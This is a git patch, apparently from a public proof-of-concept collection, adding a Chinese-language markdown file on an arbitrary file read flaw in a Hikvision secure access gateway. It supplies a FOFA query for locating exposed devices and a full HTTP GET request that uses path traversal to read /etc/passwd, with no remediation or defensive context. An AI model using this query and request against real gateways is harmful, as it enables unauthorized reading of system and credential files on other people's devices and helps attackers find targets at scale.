From d3ec0d6fbbb13a20a9bf46e04c38a34a1bf55d41 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 27 Dec 2023 20:26:24 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=B7=E5=BA=B7=E5=A8=81=E8=A7=86?= =?UTF-8?q?=E5=AE=89=E5=85=A8=E6=8E=A5=E5=85=A5=E7=BD=91=E5=85=B3=E4=BB=BB?= =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 海康威视安全接入网关任意文件读取漏洞.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 海康威视安全接入网关任意文件读取漏洞.md diff --git a/海康威视安全接入网关任意文件读取漏洞.md b/海康威视安全接入网关任意文件读取漏洞.md new file mode 100644 index 0000000..9568f8e --- /dev/null +++ b/海康威视安全接入网关任意文件读取漏洞.md @@ -0,0 +1,22 @@ +## 海康威视安全接入网关任意文件读取漏洞 +海康威视安全接入网关存在任意文件读取漏洞,通过此漏洞攻击者可读取服务器上任意文件。 + +## fofa +``` +body="webui/js/jquerylib/jquery-1.7.2.min.js" && product="ABT-应用网关" || body="webui/js/jquerylib/jquery-1.7.2.min.js" && product="HIKVISION-安全网关" +``` + +## poc +``` +GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: USGSESSID=b75bce9897c9e543ab7be9ac44af4f76 +Upgrade-Insecure-Requests: 1 +``` + +![2fa214010159c2d5b7921f7baedc8a3d](https://github.com/wy876/POC/assets/139549762/075fbfb9-1dc8-45b5-935b-1eb09d82f449)